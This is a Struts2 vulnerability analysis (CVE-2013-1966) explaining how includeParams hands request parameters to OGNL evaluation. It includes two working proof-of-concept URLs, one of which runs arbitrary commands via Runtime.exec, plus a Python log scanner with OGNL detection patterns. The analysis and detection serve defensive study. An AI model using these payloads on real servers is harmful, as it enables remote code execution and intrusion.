Struts2 includeParams attribute Command Execution Vulnerability

Source: Internet
Author: User

CVE-2013-1966 description:

The <s:a> and <s:url> tags of Apache Struts2 both provide the includeParams attribute. The values allowed for this attribute are none, get, and all. When it is set to get or all, Apache Struts2 evaluates the user-submitted parameter value as an OGNL expression, so an attacker can submit a malicious OGNL expression to execute arbitrary Java code. As long as JSP code built on Apache Struts2 uses the url or a tag with includeParams set to all or get, a remote attacker can exploit this vulnerability to execute arbitrary commands.

Impact:

Affected Versions: Apache Struts 2.0.0 through 2.3.14.1

Analysis:

The root cause is that the request parameters included by the tag are handed to OGNL and evaluated by Struts2.

The parseQueryString method in org.apache.struts2.views.util.DefaultUrlHelper is as follows:

    public Map<String, Object> parseQueryString(String queryString, boolean forceValueArray) {
        Map<String, Object> queryParams = new LinkedHashMap<String, Object>();
        if (queryString != null) {
            ...
            if (paramName != null) {
                // both the name and the value of every query parameter go through translateAndDecode
                paramName = translateAndDecode(paramName);
                String translatedParamValue = translateAndDecode(paramValue);
                ...
            }
        }
        ...
    }

    // translateAndDecode in turn calls translateVariable, which passes the raw value to OGNL:
    private String translateVariable(String input) {
        ValueStack valueStack = ServletActionContext.getContext().getValueStack();
        return TextParseUtil.translateVariables(input, valueStack);
    }


Finally, TextParseUtil.translateVariables() evaluates the value as OGNL. The official API documentation describes the method as follows:

public static String translateVariables(String expression, ValueStack stack)
Converts all instances of ${...} in expression to the value returned by a call to ValueStack.findValue(java.lang.String). If an item cannot be found on the stack (null is returned), then the entire variable ${...} is not displayed, just as if the item was on the stack but returned an empty string.
Parameters:
expression - an expression that hasn't yet been translated
Returns:
the parsed expression

So a parameter value containing ${...} with a suitable OGNL expression inside is enough to execute arbitrary commands.

POC:
http://localhost:8008/StrutsTest/login.jsp?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[1000],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%22$S\n%22),%23response.getWriter().println(%23result),%23response.getWriter().println(%22$E\n%22),%23response.close()}&cmd=cmd%20/c%20netstat

The special characters of the OGNL payload must be URL-encoded (the POC uses %23 for # and %22 for a double quote).
Inside the OGNL code, Runtime.exec() is called to run the command.

The echoed output of the command executed by the POC is as follows:

The preceding code reads the echoed data with the readFully(byte[]) method of the DataInputStream class. readFully(byte[] b) reads exactly b.length bytes from the stream: if a byte array of length len is declared, readFully(byte[len]) returns only once len bytes have been read; otherwise it blocks and waits, and if the stream ends before that many bytes arrive an EOFException is thrown. So when the command output does not fill the declared byte array, the call blocks and then fails with an exception. Declaring a shorter receiving byte array avoids this.

Alternatively, the read(byte[]) method of DataInputStream can be used to read the data. It reads the bytes currently available in the stream and returns early if the declared array is longer than the data in the stream. However, because data is sent in segments during network transmission, a single read() call may not receive the complete output.

POC2:
http://localhost:8080/StrutsTest/login.jsp?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23u=@java.lang.System@getenv(“USERNAME”),@org.apache.struts2.ServletActionContext@getResponse().getWriter().println(%23u)}
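As an added defender-side check (example code written here, not part of the original analysis or of Struts), the following Python scans web-server access log lines for the S2-013 request pattern shown in both POCs: it URL-decodes each query parameter (the POCs encode # as %23) and flags values that contain ${...} together with OGNL constructs such as #_memberAccess or @java.lang.Runtime@. The log lines are constructed samples; the combined-log format and the indicator list are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# OGNL constructs seen in the two POCs above; matched after URL-decoding, case-insensitively.
OGNL_INDICATORS = [r"#_memberAccess", r"allowStaticMethodAccess", r"@java\.lang\.Runtime@",
                   r"@java\.lang\.System@", r"@org\.apache\.struts2\.ServletActionContext@"]
INDICATOR_RE = re.compile("|".join(OGNL_INDICATORS), re.IGNORECASE)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')  # ip ... "METHOD target HTTP/x"

def decode_param(value):
    """Percent-decode repeatedly (max 3 rounds) so double-encoded payloads (%2524 -> %24 -> $) show."""
    for _ in range(3):
        value, prev = unquote(value), value
        if value == prev:
            break
    return value

def suspicious_params(target):
    """Return (name, reason) for each query parameter carrying a ${...} expression.
    '%{' is also checked: Struts evaluates it too (assumption beyond the quoted javadoc)."""
    query = target.split("?", 1)[1] if "?" in target else ""  # manual split: a raw '#' is data here
    findings = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_param(raw)
        if "${" in value or "%{" in value:
            m = INDICATOR_RE.search(value)
            reason = "expression with " + m.group(0) if m else "expression syntax in parameter"
            findings.append((name, reason))
    return findings

def scan_access_log(lines):
    """Return (client_ip, path, findings) for every log line whose request is flagged."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (findings := suspicious_params(m.group(3))):
            hits.append((m.group(1), m.group(3).split("?", 1)[0], findings))
    return hits

# Constructed sample log lines: two shortened S2-013 requests, one benign request with a '$', one double-encoded probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/May/2013:12:00:01 +0800] "GET /StrutsTest/login.jsp?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22))}&cmd=cmd%20/c%20netstat HTTP/1.1" 200 512',
    '10.0.0.6 - - [10/May/2013:12:00:02 +0800] "GET /StrutsTest/login.jsp?a=1${%23u=@java.lang.System@getenv(%22USERNAME%22)} HTTP/1.1" 200 128',
    '10.0.0.7 - - [10/May/2013:12:00:03 +0800] "GET /StrutsTest/login.jsp?user=alice&price=%2420 HTTP/1.1" 200 64',
    '10.0.0.8 - - [10/May/2013:12:00:04 +0800] "GET /StrutsTest/login.jsp?a=1%2524%257B%2523_memberAccess HTTP/1.1" 200 64',
]

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))
```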

References:

OGNL: http://commons.apache.org/proper/commons-ognl/
Struts API: http://struts.apache.org/release/2.0.x/struts2-core/apidocs/
Vulnerability Analysis: http://www.bkjia.com/Article/201305/213319.html
